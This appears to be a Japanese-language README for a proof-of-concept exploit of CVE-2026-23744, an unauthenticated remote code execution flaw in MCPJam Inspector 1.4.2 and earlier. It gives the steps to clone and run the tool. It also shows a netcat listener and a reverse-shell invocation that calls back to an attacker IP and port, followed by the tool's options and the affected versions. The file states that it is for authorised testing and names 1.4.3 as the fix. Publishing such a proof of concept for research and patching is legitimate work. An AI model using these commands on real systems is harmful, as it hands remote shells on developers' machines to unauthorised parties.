
CVE-2026-23744 を対象とし、MCPJam Inspector を標的にした未認証のリモートコード実行の概念実証です。リバースシェルとドライランデバッグのサポートを備えた、/api/mcp/connect エンドポイントを悪用するための細工された MCP serverConfig ペイロードを生成します。
CVE-2026-23744 の認証不要リモートコード実行 PoC。MCPJam Inspector 1.4.2 以前では、/api/mcp/connect を通じて、攻撃者が制御する MCP サーバーコマンドを認証なしで起動できる機能が公開されています。
許可されたテストおよび研究目的に限ります。自分が所有していない、または明示的なテスト許可を得ていないシステムに対して使用しないでください。
HTTP POST -> /api/mcp/connect -> serverConfig command -> process launch -> command execution
serverConfig ペイロードを構築します。/api/mcp/connect エンドポイントをターゲットにします。bash -c を通じて設定されたコマンドを起動します。


git clone https://github.com/ozcanpng/CVE-2026-23744.git
cd CVE-2026-23744
pip install -r requirements.txt
python3 CVE-2026-23744.py \
--url http://127.0.0.1:3000 \
--cmd 'id'
まずリスナーを起動します:
rlwrap nc -lvnp 4444
次に実行:
python3 CVE-2026-23744.py \
--url http://127.0.0.1:3000 \
--reverse-shell \
--lhost 10.10.16.53 \
--lport 4444
便利なオプション:
--cmd COMMAND コマンドを実行(デフォルト: id)
--server-id VALUE 細工した MCP 設定の serverId 値(デフォルト: pwn)
--dry-run HTTP リクエストを送信せずにペイロードフローを構築
--debug エンドポイントと JSON ペイロードを表示
--verify-tls HTTPS 証明書を検証
--timeout SECONDS HTTP タイムアウト(秒)(デフォルト: 8)
--yes リバースシェルの確認プロンプトをスキップ
| 製品 | 影響を受けるバージョン | 必要なアクセス | 影響 |
|---|---|---|---|
| MCPJam Inspector | <= 1.4.2 | なし | MCPJam Inspector プロセスユーザーとしてのリモートコマンド実行 |
この問題は、MCPJam Inspector が 0.0.0.0 でリッスンしている場合に特に顕著で、リモートホストが開発サービスに到達可能になります。
/api/mcp/connect に送信します。serverConfig.command と serverConfig.args を通じて渡されます。--cmd を使用することを推奨します。--dry-run --debug を使用すると、ターゲットに触れずに生成されたリクエストを検査できます。1.4.3 に上流のパッチが含まれています。ozcanpng — github.com/ozcanpng — ozcanpng.dev